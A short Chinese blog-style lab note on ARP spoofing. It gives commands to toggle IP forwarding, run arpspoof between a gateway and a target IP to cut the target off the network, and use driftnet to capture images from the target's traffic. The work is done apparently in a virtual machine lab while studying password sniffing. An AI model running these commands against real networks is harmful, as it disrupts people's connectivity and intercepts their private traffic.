这几天在研究嗅探密码的时候，发现了一些网上资料与自己操作不太一样的地方，就是按照网上资料逐步进行，攻击目标主机，目标主机无法上网，因此总结了让目标断网的方法。

1、开启IP转发

echo 1 > /proc/sys/net/ipv4/ip_forward

               查看IP转发状态： 

cat /proc/sys/net/ipv4/ip_forward

 

      看到网上很多资料说，让目标断网的关键是关闭IP转发，这确实是一个办法。状态为0是关闭，状态为1是开启。

2、ARP欺骗

         

arpspoof -i wlan0 -t 网关IP 目标IP

        由于我是使用虚拟机进行ARP欺骗，正常按照以上公式，若将网关IP和目标IP调换位置，同样能实现目标机断网，即

arpspoof -i wlan0 -t 目标IP 网关IP

   3、测试

         ARP欺骗进行断网，在目标机打开网站，发现网页打不开

        调换网关IP和目标IP的位置，打开网易新闻，目标机可以正常打开网页

 

   同时，在虚拟机使用  driftnet截获信息流中的图片，截取成功